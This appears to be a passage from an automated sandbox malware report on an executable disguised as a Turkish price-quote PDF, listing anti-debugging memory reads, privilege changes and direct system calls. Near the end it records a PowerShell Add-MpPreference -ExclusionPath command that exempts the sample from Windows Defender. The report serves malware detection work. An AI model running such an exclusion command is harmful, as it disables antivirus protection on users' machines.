            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B505A7 mov eax, dword ptr fs:[00000030h]7_2_01B505A7
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B505A7 mov eax, dword ptr fs:[00000030h]7_2_01B505A7
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AF45B1 mov eax, dword ptr fs:[00000030h]7_2_01AF45B1
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AF45B1 mov eax, dword ptr fs:[00000030h]7_2_01AF45B1
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0E59C mov eax, dword ptr fs:[00000030h]7_2_01B0E59C
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD2582 mov eax, dword ptr fs:[00000030h]7_2_01AD2582
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD2582 mov ecx, dword ptr fs:[00000030h]7_2_01AD2582
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B04588 mov eax, dword ptr fs:[00000030h]7_2_01B04588
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFE5E7 mov eax, dword ptr fs:[00000030h]7_2_01AFE5E7
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFE5E7 mov eax, dword ptr fs:[00000030h]7_2_01AFE5E7
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFE5E7 mov eax, dword ptr fs:[00000030h]7_2_01AFE5E7
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFE5E7 mov eax, dword ptr fs:[00000030h]7_2_01AFE5E7
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFE5E7 mov eax, dword ptr fs:[00000030h]7_2_01AFE5E7
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFE5E7 mov eax, dword ptr fs:[00000030h]7_2_01AFE5E7
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFE5E7 mov eax, dword ptr fs:[00000030h]7_2_01AFE5E7
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFE5E7 mov eax, dword ptr fs:[00000030h]7_2_01AFE5E7
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD25E0 mov eax, dword ptr fs:[00000030h]7_2_01AD25E0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0C5ED mov eax, dword ptr fs:[00000030h]7_2_01B0C5ED
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0C5ED mov eax, dword ptr fs:[00000030h]7_2_01B0C5ED
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0A5D0 mov eax, dword ptr fs:[00000030h]7_2_01B0A5D0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0A5D0 mov eax, dword ptr fs:[00000030h]7_2_01B0A5D0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD65D0 mov eax, dword ptr fs:[00000030h]7_2_01AD65D0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0E5CF mov eax, dword ptr fs:[00000030h]7_2_01B0E5CF
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0E5CF mov eax, dword ptr fs:[00000030h]7_2_01B0E5CF
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFE53E mov eax, dword ptr fs:[00000030h]7_2_01AFE53E
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFE53E mov eax, dword ptr fs:[00000030h]7_2_01AFE53E
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFE53E mov eax, dword ptr fs:[00000030h]7_2_01AFE53E
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFE53E mov eax, dword ptr fs:[00000030h]7_2_01AFE53E
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFE53E mov eax, dword ptr fs:[00000030h]7_2_01AFE53E
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE0535 mov eax, dword ptr fs:[00000030h]7_2_01AE0535
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE0535 mov eax, dword ptr fs:[00000030h]7_2_01AE0535
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE0535 mov eax, dword ptr fs:[00000030h]7_2_01AE0535
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE0535 mov eax, dword ptr fs:[00000030h]7_2_01AE0535
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE0535 mov eax, dword ptr fs:[00000030h]7_2_01AE0535
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE0535 mov eax, dword ptr fs:[00000030h]7_2_01AE0535
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B66500 mov eax, dword ptr fs:[00000030h]7_2_01B66500
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01BA4500 mov eax, dword ptr fs:[00000030h]7_2_01BA4500
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01BA4500 mov eax, dword ptr fs:[00000030h]7_2_01BA4500
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01BA4500 mov eax, dword ptr fs:[00000030h]7_2_01BA4500
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01BA4500 mov eax, dword ptr fs:[00000030h]7_2_01BA4500
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01BA4500 mov eax, dword ptr fs:[00000030h]7_2_01BA4500
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01BA4500 mov eax, dword ptr fs:[00000030h]7_2_01BA4500
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01BA4500 mov eax, dword ptr fs:[00000030h]7_2_01BA4500
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0656A mov eax, dword ptr fs:[00000030h]7_2_01B0656A
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0656A mov eax, dword ptr fs:[00000030h]7_2_01B0656A
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0656A mov eax, dword ptr fs:[00000030h]7_2_01B0656A
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD8550 mov eax, dword ptr fs:[00000030h]7_2_01AD8550
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD8550 mov eax, dword ptr fs:[00000030h]7_2_01AD8550
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B044B0 mov ecx, dword ptr fs:[00000030h]7_2_01B044B0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B5A4B0 mov eax, dword ptr fs:[00000030h]7_2_01B5A4B0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD64AB mov eax, dword ptr fs:[00000030h]7_2_01AD64AB
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B8A49A mov eax, dword ptr fs:[00000030h]7_2_01B8A49A
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD04E5 mov ecx, dword ptr fs:[00000030h]7_2_01AD04E5
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0A430 mov eax, dword ptr fs:[00000030h]7_2_01B0A430
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ACC427 mov eax, dword ptr fs:[00000030h]7_2_01ACC427
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ACE420 mov eax, dword ptr fs:[00000030h]7_2_01ACE420
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ACE420 mov eax, dword ptr fs:[00000030h]7_2_01ACE420
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ACE420 mov eax, dword ptr fs:[00000030h]7_2_01ACE420
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B56420 mov eax, dword ptr fs:[00000030h]7_2_01B56420
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B56420 mov eax, dword ptr fs:[00000030h]7_2_01B56420
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B56420 mov eax, dword ptr fs:[00000030h]7_2_01B56420
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B56420 mov eax, dword ptr fs:[00000030h]7_2_01B56420
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B56420 mov eax, dword ptr fs:[00000030h]7_2_01B56420
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B56420 mov eax, dword ptr fs:[00000030h]7_2_01B56420
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B56420 mov eax, dword ptr fs:[00000030h]7_2_01B56420
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B08402 mov eax, dword ptr fs:[00000030h]7_2_01B08402
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B08402 mov eax, dword ptr fs:[00000030h]7_2_01B08402
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B08402 mov eax, dword ptr fs:[00000030h]7_2_01B08402
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B5C460 mov ecx, dword ptr fs:[00000030h]7_2_01B5C460
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFA470 mov eax, dword ptr fs:[00000030h]7_2_01AFA470
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFA470 mov eax, dword ptr fs:[00000030h]7_2_01AFA470
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFA470 mov eax, dword ptr fs:[00000030h]7_2_01AFA470
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B8A456 mov eax, dword ptr fs:[00000030h]7_2_01B8A456
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AC645D mov eax, dword ptr fs:[00000030h]7_2_01AC645D
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0E443 mov eax, dword ptr fs:[00000030h]7_2_01B0E443
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0E443 mov eax, dword ptr fs:[00000030h]7_2_01B0E443
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0E443 mov eax, dword ptr fs:[00000030h]7_2_01B0E443
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0E443 mov eax, dword ptr fs:[00000030h]7_2_01B0E443
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0E443 mov eax, dword ptr fs:[00000030h]7_2_01B0E443
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0E443 mov eax, dword ptr fs:[00000030h]7_2_01B0E443
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0E443 mov eax, dword ptr fs:[00000030h]7_2_01B0E443
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0E443 mov eax, dword ptr fs:[00000030h]7_2_01B0E443
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AF245A mov eax, dword ptr fs:[00000030h]7_2_01AF245A
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD07AF mov eax, dword ptr fs:[00000030h]7_2_01AD07AF
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B847A0 mov eax, dword ptr fs:[00000030h]7_2_01B847A0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B7678E mov eax, dword ptr fs:[00000030h]7_2_01B7678E
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AF27ED mov eax, dword ptr fs:[00000030h]7_2_01AF27ED
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AF27ED mov eax, dword ptr fs:[00000030h]7_2_01AF27ED
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AF27ED mov eax, dword ptr fs:[00000030h]7_2_01AF27ED
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B5E7E1 mov eax, dword ptr fs:[00000030h]7_2_01B5E7E1
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD47FB mov eax, dword ptr fs:[00000030h]7_2_01AD47FB
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD47FB mov eax, dword ptr fs:[00000030h]7_2_01AD47FB
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ADC7C0 mov eax, dword ptr fs:[00000030h]7_2_01ADC7C0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B507C3 mov eax, dword ptr fs:[00000030h]7_2_01B507C3
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B4C730 mov eax, dword ptr fs:[00000030h]7_2_01B4C730
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0273C mov eax, dword ptr fs:[00000030h]7_2_01B0273C
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0273C mov ecx, dword ptr fs:[00000030h]7_2_01B0273C
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0273C mov eax, dword ptr fs:[00000030h]7_2_01B0273C
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0C720 mov eax, dword ptr fs:[00000030h]7_2_01B0C720
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0C720 mov eax, dword ptr fs:[00000030h]7_2_01B0C720
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B00710 mov eax, dword ptr fs:[00000030h]7_2_01B00710
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0C700 mov eax, dword ptr fs:[00000030h]7_2_01B0C700
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD0710 mov eax, dword ptr fs:[00000030h]7_2_01AD0710
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD8770 mov eax, dword ptr fs:[00000030h]7_2_01AD8770
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE0770 mov eax, dword ptr fs:[00000030h]7_2_01AE0770
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE0770 mov eax, dword ptr fs:[00000030h]7_2_01AE0770
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE0770 mov eax, dword ptr fs:[00000030h]7_2_01AE0770
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE0770 mov eax, dword ptr fs:[00000030h]7_2_01AE0770
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE0770 mov eax, dword ptr fs:[00000030h]7_2_01AE0770
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE0770 mov eax, dword ptr fs:[00000030h]7_2_01AE0770
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE0770 mov eax, dword ptr fs:[00000030h]7_2_01AE0770
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE0770 mov eax, dword ptr fs:[00000030h]7_2_01AE0770
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE0770 mov eax, dword ptr fs:[00000030h]7_2_01AE0770
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE0770 mov eax, dword ptr fs:[00000030h]7_2_01AE0770
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE0770 mov eax, dword ptr fs:[00000030h]7_2_01AE0770
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE0770 mov eax, dword ptr fs:[00000030h]7_2_01AE0770
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B54755 mov eax, dword ptr fs:[00000030h]7_2_01B54755
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B12750 mov eax, dword ptr fs:[00000030h]7_2_01B12750
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B12750 mov eax, dword ptr fs:[00000030h]7_2_01B12750
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B5E75D mov eax, dword ptr fs:[00000030h]7_2_01B5E75D
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD0750 mov eax, dword ptr fs:[00000030h]7_2_01AD0750
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0674D mov esi, dword ptr fs:[00000030h]7_2_01B0674D
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0674D mov eax, dword ptr fs:[00000030h]7_2_01B0674D
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0674D mov eax, dword ptr fs:[00000030h]7_2_01B0674D
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B066B0 mov eax, dword ptr fs:[00000030h]7_2_01B066B0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0C6A6 mov eax, dword ptr fs:[00000030h]7_2_01B0C6A6
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD4690 mov eax, dword ptr fs:[00000030h]7_2_01AD4690
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD4690 mov eax, dword ptr fs:[00000030h]7_2_01AD4690
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B506F1 mov eax, dword ptr fs:[00000030h]7_2_01B506F1
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B506F1 mov eax, dword ptr fs:[00000030h]7_2_01B506F1
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B4E6F2 mov eax, dword ptr fs:[00000030h]7_2_01B4E6F2
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B4E6F2 mov eax, dword ptr fs:[00000030h]7_2_01B4E6F2
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B4E6F2 mov eax, dword ptr fs:[00000030h]7_2_01B4E6F2
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B4E6F2 mov eax, dword ptr fs:[00000030h]7_2_01B4E6F2
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0A6C7 mov ebx, dword ptr fs:[00000030h]7_2_01B0A6C7
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0A6C7 mov eax, dword ptr fs:[00000030h]7_2_01B0A6C7
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD262C mov eax, dword ptr fs:[00000030h]7_2_01AD262C
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AEE627 mov eax, dword ptr fs:[00000030h]7_2_01AEE627
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B06620 mov eax, dword ptr fs:[00000030h]7_2_01B06620
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B08620 mov eax, dword ptr fs:[00000030h]7_2_01B08620
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe"
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtProtectVirtualMemory: Direct from: 0x77542F9C
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtSetInformationProcess: Direct from: 0x77542C5C
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtOpenKeyEx: Direct from: 0x77542B9C
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtProtectVirtualMemory: Direct from: 0x77537B2E
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtCreateFile: Direct from: 0x77542FEC
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtOpenFile: Direct from: 0x77542DCC
